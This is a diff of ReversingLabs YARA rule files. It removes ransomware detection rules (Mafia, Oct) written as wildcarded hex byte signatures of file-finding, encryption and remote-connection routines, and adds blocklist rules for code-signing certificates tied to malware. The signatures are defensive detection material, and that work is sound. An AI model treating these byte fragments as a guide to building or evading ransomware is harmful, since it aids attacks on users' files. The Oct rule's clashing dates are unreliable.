-            ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 57 57 57 50 57 53 FF 15 ?? ?? ?? ?? 8B F0 8B 85 ??
-            ?? ?? ?? 83 FE ?? 75 ?? 50 57 57 53 E8 ?? ?? ?? ?? 83 C4 ?? 8B F8 83 FE ?? 74 ?? 56
-            FF 15 ?? ?? ?? ?? 8B C7 8B 4D ?? 5F 5E 33 CD 5B E8 ?? ?? ?? ?? 8B E5 5D C3 8B 48 ??
-            2B 08 C1 F9 ?? 89 8D ?? ?? ?? ?? 80 BD ?? ?? ?? ?? ?? 75 ?? 8A 8D ?? ?? ?? ?? 84 C9
-            74 ?? 80 F9 ?? 75 ?? 80 BD ?? ?? ?? ?? ?? 74 ?? 50 FF B5 ?? ?? ?? ?? 8D 85 ?? ?? ??
-            ?? 53 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 8D 85 ?? ?? ?? ?? 50 56 FF 15 ?? ?? ??
-            ?? 85 C0 8B 85 ?? ?? ?? ?? 75 ?? 8B 10 8B 40 ?? 8B 8D ?? ?? ?? ?? 2B C2 C1 F8 ?? 3B
-            C8 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 2B C1 6A ?? 50 8D 04 8A 50 E8 ?? ?? ?? ?? 83 C4
-            ?? E9
-        }
-		$encrypt_files_p1 = {
-            83 EC ?? 8B 44 24 ?? 53 55 56 8B F1 89 44 24 ?? 57 8B 7C 24 ?? 8B 6E ?? 3B FD 77 ??
-            8B DE 83 FD ?? 72 ?? 8B 1E 57 50 53 89 7E ?? E8 ?? ?? ?? ?? 83 C4 ?? C6 04 1F ?? 8B
-            C6 5F 5E 5D 5B 83 C4 ?? C2 ?? ?? 81 FF ?? ?? ?? ?? 0F 87 ?? ?? ?? ?? 8B DF 83 CB ??
-            81 FB ?? ?? ?? ?? 76 ?? BB ?? ?? ?? ?? EB ?? 8B CD B8 ?? ?? ?? ?? D1 E9 2B C1 3B E8
-            76 ?? BB ?? ?? ?? ?? EB ?? 8D 04 29 3B D8 0F 42 D8 33 C9 8B C3 83 C0 ?? 0F 92 C1 F7
-            D9 0B C8 51 8B CE E8 ?? ?? ?? ?? 57 FF 74 24 ?? 89 44 24 ?? 50 89 7E ?? 89 5E ?? E8
-            ?? ?? ?? ?? 8B 5C 24 ?? 83 C4 ?? C6 04 1F ?? 83 FD ?? 72 ?? 8B 06 45 81 FD ?? ?? ??
-            ?? 72 ?? 8B 48 ?? 83 C5 ?? 2B C1 83 C0 ?? 83 F8 ?? 77 ?? 8B C1 55 50 E8 ?? ?? ?? ??
-            83 C4 ?? 5F 89 1E 8B C6 5E 5D 5B 83 C4 ?? C2 ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? CC
-            CC CC CC CC 83 EC ?? 53 55 8B 6C 24 ?? 56 57 8B F9 8B 4C 24 ?? 89 4C 24 ?? 8B 5F ??
-            3B EB 77 ?? 89 7C 24 ?? 8B C7 83 FB ?? 72 ?? 8B 07 89 44 24 ?? 8D 34 6D
-        }
-		$encrypt_files_p2 = {
-            89 6F ?? 56 51 50 E8 ?? ?? ?? ?? 8B 44 24 ?? 83 C4 ?? 33 C9 66 89 0C 06 8B C7 5F 5E
-            5D 5B 83 C4 ?? C2 ?? ?? 81 FD ?? ?? ?? ?? 0F 87 ?? ?? ?? ?? 8B F5 83 CE ?? 81 FE ??
-            ?? ?? ?? 76 ?? BE ?? ?? ?? ?? EB ?? 8B CB B8 ?? ?? ?? ?? D1 E9 2B C1 3B D8 76 ?? BE
-            ?? ?? ?? ?? EB ?? 8D 04 19 3B F0 0F 42 F0 33 C9 8B C6 83 C0 ?? 0F 92 C1 F7 D9 0B C8
-            51 8B CF E8 ?? ?? ?? ?? 89 77 ?? 8D 34 6D ?? ?? ?? ?? 56 FF 74 24 ?? 89 44 24 ?? 50
-            89 6F ?? E8 ?? ?? ?? ?? 8B 6C 24 ?? 33 C0 83 C4 ?? 66 89 04 2E 83 FB ?? 72 ?? 8B 07
-            8D 1C 5D ?? ?? ?? ?? 81 FB ?? ?? ?? ?? 72 ?? 8B 48 ?? 83 C3 ?? 2B C1 83 C0 ?? 83 F8
-            ?? 77 ?? 8B C1 53 50 E8 ?? ?? ?? ?? 83 C4 ?? 89 2F 8B C7 5F 5E 5D 5B 83 C4 ?? C2 ??
-            ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? CC 8B 44 24 ?? 83 EC ?? 83 E0 ?? 89 41 ?? 8B 49 ??
-            23 C8 75 ?? 83 C4 ?? C2 ?? ?? 56 F6 C1 ?? 74 ?? BE ?? ?? ?? ?? EB ?? F6 C1 ?? BE ??
-            ?? ?? ?? B8 ?? ?? ?? ?? 0F 44 F0 8D 44 24 ?? 6A ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 4C
-            24 ?? 50 56 E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ?? 50 E8 ?? ?? ?? ?? 5E
-        }
-		$encrypt_files_angus_version = {
-            6A ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ??
-            ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ??
-            ?? 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 8B 85
-            ?? ?? ?? ?? 0F 43 8D ?? ?? ?? ?? 03 C1 83 BD ?? ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 0F 43
-            8D ?? ?? ?? ?? 50 51 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? C7 85 ?? ?? ?? ?? ??
-            ?? ?? ?? B9 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 39 8D ?? ?? ?? ?? 8D 85 ?? ??
-            ?? ?? C6 85 ?? ?? ?? ?? ?? 0F 42 8D ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 51 0F 43 85 ??
-            ?? ?? ?? 8D 8D ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8B 95 ?? ?? ?? ??
-            C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 83 FA ?? 72 ?? 8B 8D ?? ?? ?? ?? 42 8B C1 81 FA ?? ??
-            ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 52 51 E8 ??
-            ?? ?? ?? 83 C4 ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85
-            ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? C7 85 ??
-            ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? E8 ?? ?? ??
-            ?? C6 45 ?? ?? 8D 8D ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ??
-            C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ??
-            C6 45 ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ??
-            ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 8D 8D
-            ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? E8
-        }
+	condition:
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Yu Bao" and pe.signatures [ i ] . serial == "02:96:cf:33:14:f4:34:c5:b7:4d:0c:3e:36:61:6d:d1" and 1474934400 <= pe.signatures [ i ] . not_after )
+}
+
+rule REVERSINGLABS_Cert_Blocklist_045D57D63E13775C8F812E1864797F5A : INFO FILE
+{
+	meta:
+		description = "Certificate used for digitally signing malware."
+		author = "ReversingLabs"
+		id = "c2c37ddc-51bc-58da-b770-df97aebca01d"
+		date = "2020-08-05"
+		modified = "2023-11-08"
+		reference = "ReversingLabs"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L13602-L13618"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
+		logic_hash = "d3e61e9a43f5b17ebb08b71dc39648d1f20273a18214f39605f365f9f0f72c10"
+		score = 75
+		quality = 90
+		tags = "INFO, FILE"
+		status = "RELEASED"
+		sharing = "TLP:WHITE"
+		category = "INFO"
+		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and ( $find_files ) and ( ( all of ( $encrypt_files_p* ) ) or ( $encrypt_files_angus_version ) ) and ( all of ( $remote_connection_p* ) )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Yuanyuan Mei" and pe.signatures [ i ] . serial == "04:5d:57:d6:3e:13:77:5c:8f:81:2e:18:64:79:7f:5a" and 1485043200 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Bytecode_MSIL_Ransomware_Oct : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_6D633Df9Bb6015Fc3Ecea99Dff309Ee7 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects Oct ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "e811a0ba-52df-5e88-ab71-df91d5cb584a"
-		date = "2026-10-22"
-		date = "2026-10-22"
-		modified = "2021-08-12"
+		id = "b85bf9c5-f438-5973-83ab-926e44cf2298"
+		date = "2020-08-05"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/ByteCode.MSIL.Ransomware.Oct.yara#L1-L68"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L13620-L13636"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "3973794d6bf26eaa752cfc70a217c059a190c63a0dd92b06de7c0893d92d9e88"
+		logic_hash = "84e2f427ee79b47db8d0e5f1e2217a7e1c1ea64047e01b4ea6db69f529501f36"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$encrypt_files = {
-            1E 8D ?? ?? ?? ?? 25 D0 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0A 03 0B 07 18 73 ?? ?? ?? ?? 0C 73
-            ?? ?? ?? ?? 0D 09 20 ?? ?? ?? ?? 6F ?? ?? ?? ?? 09 20 ?? ?? ?? ?? 6F ?? ?? ?? ?? 04 06
-            20 ?? ?? ?? ?? 73 ?? ?? ?? ?? 13 ?? 09 11 ?? 09 6F ?? ?? ?? ?? 1E 5B 6F ?? ?? ?? ?? 6F
-            ?? ?? ?? ?? 09 11 ?? 09 6F ?? ?? ?? ?? 1E 5B 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 09 19 6F ??
-            ?? ?? ?? 09 17 6F ?? ?? ?? ?? 08 09 6F ?? ?? ?? ?? 17 73 ?? ?? ?? ?? 13 ?? 02 19 73 ??
-            ?? ?? ?? 13 ?? 2B ?? 11 ?? 11 ?? D2 6F ?? ?? ?? ?? 11 ?? 6F ?? ?? ?? ?? 25 13 ?? 15 33
-            ?? 11 ?? 6F ?? ?? ?? ?? 11 ?? 6F ?? ?? ?? ?? 08 6F ?? ?? ?? ?? 02 28 ?? ?? ?? ?? DE ??
-            13 ?? 11 ?? 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? DE ?? 2A
-        }
-		$find_files = {
-            16 0A 38 ?? ?? ?? ?? 16 0B 2B ?? 02 06 9A 28 ?? ?? ?? ?? 2C ?? 02 06 9A 73 ?? ?? ?? ??
-            0C 08 72 ?? ?? ?? ?? 03 07 9A 28 ?? ?? ?? ?? 17 6F ?? ?? ?? ?? 0D 09 13 ?? 16 13 ?? 2B
-            ?? 11 ?? 11 ?? 9A 13 ?? 11 ?? 6F ?? ?? ?? ?? 11 ?? 6F ?? ?? ?? ?? 05 28 ?? ?? ?? ?? 1E
-            8D ?? ?? ?? ?? 25 D0 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 11 ?? 17 58 13 ?? 11 ??
-            11 ?? 8E 69 32 ?? 07 17 58 0B 07 03 8E 69 32 ?? 06 17 58 0A 06 02 8E 69 3F ?? ?? ?? ??
-            2A
-        }
-		$collect_env_and_start_enc_proc = {
-            19 8D ?? ?? ?? ?? 0B 07 16 16 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? A2 07 17 1B
-            28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? A2 07 18 1F ?? 28 ?? ?? ?? ?? 72 ?? ?? ??
-            ?? 28 ?? ?? ?? ?? A2 07 1F ?? 8D ?? ?? ?? ?? 0C 08 16 72 ?? ?? ?? ?? A2 08 17 72 ?? ??
-            ?? ?? A2 08 18 72 ?? ?? ?? ?? A2 08 19 72 ?? ?? ?? ?? A2 08 1A 72 ?? ?? ?? ?? A2 08 1B
-            72 ?? ?? ?? ?? A2 08 1C 72 ?? ?? ?? ?? A2 08 1D 72 ?? ?? ?? ?? A2 08 1E 72 ?? ?? ?? ??
-            A2 08 1F ?? 72 ?? ?? ?? ?? A2 08 1F ?? 72 ?? ?? ?? ?? A2 08 1F ?? 72 ?? ?? ?? ?? A2 08
-            1F ?? 72 ?? ?? ?? ?? A2 08 1F ?? 72 ?? ?? ?? ?? A2 08 1F ?? 72 ?? ?? ?? ?? A2 08 1F ??
-            72 ?? ?? ?? ?? A2 08 1F ?? 72 ?? ?? ?? ?? A2 08 1F ?? 72 ?? ?? ?? ?? A2 08 1F ?? 72 ??
-            ?? ?? ?? A2 08 1F ?? 72 ?? ?? ?? ?? A2 08 1F ?? 72 ?? ?? ?? ?? A2 08 1F ?? 72 ?? ?? ??
-            ?? A2 08 1F ?? 72 ?? ?? ?? ?? A2 08 1F ?? 72 ?? ?? ?? ?? A2 08 72 ?? ?? ?? ?? 72 ?? ??
-            ?? ?? 28 ?? ?? ?? ?? 16 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 73 ?? ?? ?? ?? 0A
-            06 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? DE ?? 06 2C ?? 06 6F ?? ?? ?? ?? DC 72 ?? ?? ?? ?? 16
-            28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 26 7E ?? ?? ?? ?? 72 ?? ??
-            ?? ?? 28 ?? ?? ?? ?? 2C ?? 28 ?? ?? ?? ?? 2A
-        }
+	condition:
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Yuanyuan Zhang" and pe.signatures [ i ] . serial == "6d:63:3d:f9:bb:60:15:fc:3e:ce:a9:9d:ff:30:9e:e7" and 1474156800 <= pe.signatures [ i ] . not_after )
+}
+
+rule REVERSINGLABS_Cert_Blocklist_22E2A66E63B8Cb4Ec6989Bf7 : INFO FILE
+{
+	meta:
+		description = "Certificate used for digitally signing malware."
+		author = "ReversingLabs"
+		id = "5c028a6c-890c-54f1-aea2-ac04ce654907"
+		date = "2020-08-05"
+		modified = "2023-11-08"
+		reference = "ReversingLabs"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L13638-L13654"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
+		logic_hash = "2099c508d1fd986f34f14aa396a5aaa136e2cdd2226099acdca9c14f6f6342eb"
+		score = 75
+		quality = 90
+		tags = "INFO, FILE"
+		status = "RELEASED"
+		sharing = "TLP:WHITE"
+		category = "INFO"
+		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and ( $collect_env_and_start_enc_proc ) and ( $find_files ) and ( $encrypt_files )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Sivi Technology Limited" and pe.signatures [ i ] . serial == "22:e2:a6:6e:63:b8:cb:4e:c6:98:9b:f7" and 1466995365 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Mafia : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_654B406De388Ec2Aec253Ff2Ba4C4Bbd : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects Mafia ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "67f09000-751f-539a-b222-25b1502c2728"
-		date = "2020-06-26"
-		modified = "2020-07-15"
+		id = "9820112d-d59b-57e7-ae78-7b427f70d529"
+		date = "2020-08-05"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.Mafia.yara#L1-L142"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L13656-L13672"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "5c17b799f0b4f1f8f72a2e4203a6606f7783ceec2034694f8a21ff65e5afdb26"
+		logic_hash = "a1aadaded55c8b0d85ac09ba9ab27fefaeec2969cdabaf26ff0c41bf33422ddc"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "Mafia"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$find_files = {
-            55 8B EC 83 E4 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C4 89 84 24 ?? ??
-            ?? ?? 53 56 57 68 ?? ?? ?? ?? 8D 44 24 ?? 8B F1 6A ?? 50 89 74 24 ?? C7 44 24 ?? ??
-            ?? ?? ?? E8 ?? ?? ?? ?? 33 C9 68 ?? ?? ?? ?? 51 8D 94 24 ?? ?? ?? ?? 52 66 89 8C 24
-            ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 68 ?? ?? ?? ?? 50 8D 8C 24 ?? ?? ?? ?? 51 66 89 84
-            24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 56 8D 94 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 52 E8 ?? ?? ??
-            ?? 83 C4 ?? 8D 44 24 ?? 50 8D 8C 24 ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 8B D8 83 FB ??
-            0F 85 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 50 8D 94 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 52 E8 ??
-            ?? ?? ?? 8B 35 ?? ?? ?? ?? 83 C4 ?? 8D 84 24 ?? ?? ?? ?? 50 FF D6 68 ?? ?? ?? ?? 8D
-            8C 24 ?? ?? ?? ?? 6A ?? 51 E8 ?? ?? ?? ?? 8D 94 24 ?? ?? ?? ?? 52 8D 84 24 ?? ?? ??
-            ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 8C 24 ?? ?? ?? ?? 51 FF D6 B8 ?? ??
-            ?? ?? 5F 5E 5B 8B 8C 24 ?? ?? ?? ?? 33 CC E8 ?? ?? ?? ?? 8B E5 5D C3 56 81 EC ?? ??
-            ?? ?? B9 ?? ?? ?? ?? 8D B4 24 ?? ?? ?? ?? 8B FC F3 A5 E8 ?? ?? ?? ?? 81 C4 ?? ?? ??
-            ?? 8D 54 24 ?? 52 53 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 8B 44 24 ?? 50 81 EC ?? ?? ?? ??
-            B9 ?? ?? ?? ?? 8D B4 24 ?? ?? ?? ?? 8B FC F3 A5 E8 ?? ?? ?? ?? 81 C4 ?? ?? ?? ?? 8D
-            4C 24 ?? 51 53 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 53 FF 15 ?? ?? ?? ?? 8B 8C 24 ?? ?? ??
-            ?? 5F 5E 5B 33 CC 33 C0 E8 ?? ?? ?? ?? 8B E5 5D C3
-        }
-		$remote_connection_p1 = {
-            55 8B EC B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 53 56 33 C0 57
-            68 ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? 51 66 89 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 89 85
-            ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 66 89 85 ?? ?? ?? ?? 88 85 ?? ?? ?? ?? E8 ?? ?? ?? ??
-            68 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 6A ?? 52 C6 85 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ??
-            ?? ?? ?? 8D 85 ?? ?? ?? ?? 6A ?? 50 C6 85 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ??
-            ?? 8D 8D ?? ?? ?? ?? 6A ?? 51 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? E8
-            ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 85 C0 75 ??
-            68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 5F 5E 5B 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C3
-            68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 68 ??
-            ?? ?? ?? 52 E8 ?? ?? ?? ?? 8B 3D ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? 83 C4 ?? 33 C0 68 ??
-            ?? ?? ?? 50 89 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ??
-            8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 6A ?? 51 E8 ??
-            ?? ?? ?? 83 C4 ?? 6A ?? 6A ?? 6A ?? FF 15 ?? ?? ?? ?? 8B F0 33 C0 89 85
-        }
-		$remote_connection_p2 = {
-            89 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ??
-            ?? 66 89 95 ?? ?? ?? ?? 8B 48 ?? 8B 11 8B 02 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 51 8D
-            95 ?? ?? ?? ?? 68 ?? ?? ?? ?? 52 89 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? FF
-            15 ?? ?? ?? ?? 66 89 85 ?? ?? ?? ?? 6A ?? 8D 85 ?? ?? ?? ?? 50 56 FF 15 ?? ?? ?? ??
-            83 F8 ?? 0F 84 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 8D 50 ?? 8B FF 8A 08 40 84 C9 75 ?? 6A
-            ?? 2B C2 50 8D 8D ?? ?? ?? ?? 51 56 FF 15 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8D 95 ??
-            ?? ?? ?? 52 56 FF D3 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 85
-            C0 0F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF D7 8B 8D ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 50
-            8D 95 ?? ?? ?? ?? 68 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 50 FF
-            D7 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 6A ?? 51 E8 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 52 8D
-            85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 8D ?? ?? ?? ?? 51 FF D7
-            68 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 6A ?? 52 E8 ?? ?? ?? ?? 53 8D 85 ?? ?? ?? ?? 68 ??
-            ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 8D ?? ?? ?? ?? 51 FF D7 68 ?? ?? ?? ?? 8D 95
-            ?? ?? ?? ?? 6A ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 56 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF
-            15 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 40 89 85 ?? ?? ?? ?? 83 F8 ?? 0F 85 ?? ?? ?? ?? EB
-            ?? 68 ?? ?? ?? ?? FF D7 56 FF 15 ?? ?? ?? ?? 5F 5E 5B 8B 4D ?? 33 CD E8 ?? ?? ?? ??
-            8B E5 5D C3 68
-        }
-		$encrypt_files_p1 = {
-            55 8B EC 83 E4 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C4 89 84 24 ?? ??
-            ?? ?? 53 56 8B 75 ?? 57 68 ?? ?? ?? ?? 33 DB 8D 8C 24 ?? ?? ?? ?? 33 C0 53 51 66 89
-            84 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 8D 54 24 ?? 53 52 89 5C 24
-            ?? E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 8D 44 24 ?? 53 50 89 5C 24 ?? E8 ?? ?? ?? ?? 83 C4
-            ?? 33 C0 68 ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? 53 51 89 5C 24 ?? 89 44 24 ?? 89 44 24
-            ?? 89 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? 88 84 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ??
-            68 ?? ?? ?? ?? 8D 94 24 ?? ?? ?? ?? 53 52 88 9C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4
-            ?? 68 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 53 50 88 9C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83
-            C4 ?? 68 ?? ?? ?? ?? 8D 94 24 ?? ?? ?? ?? 33 C9 53 52 66 89 8C 24 ?? ?? ?? ?? E8 ??
-            ?? ?? ?? 8B 4D ?? 8B C1 83 C4 ?? 48 74 ?? 48 74 ?? 8B 45 ?? 8B 55 ?? 50 52 51 56 FF
-            15 ?? ?? ?? ?? 5F 5E 5B 8B 8C 24 ?? ?? ?? ?? 33 CC E8 ?? ?? ?? ?? 8B E5 5D C2
-        }
-		$encrypt_files_p2 = {
-            53 FF 15 ?? ?? ?? ?? 8B 8C 24 ?? ?? ?? ?? 5F 5E 5B 33 CC 33 C0 E8 ?? ?? ?? ?? 8B E5
-            5D C2 ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 68 ?? ?? ?? ??
-            FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 50 E8
-            ?? ?? ?? ?? 83 C4 ?? 33 F6 E8 ?? ?? ?? ?? 25 ?? ?? ?? ?? 79 ?? 48 0D ?? ?? ?? ?? 40
-            88 86 ?? ?? ?? ?? 46 83 FE ?? 7C ?? 33 F6 E8 ?? ?? ?? ?? 25 ?? ?? ?? ?? 79 ?? 48 0D
-            ?? ?? ?? ?? 40 88 86 ?? ?? ?? ?? 46 83 FE ?? 7C ?? 68 ?? ?? ?? ?? 8D 8C 24 ?? ?? ??
-            ?? 68 ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? EB ?? 8D 49 ?? 0F B6 83 ?? ?? ?? ?? 6A
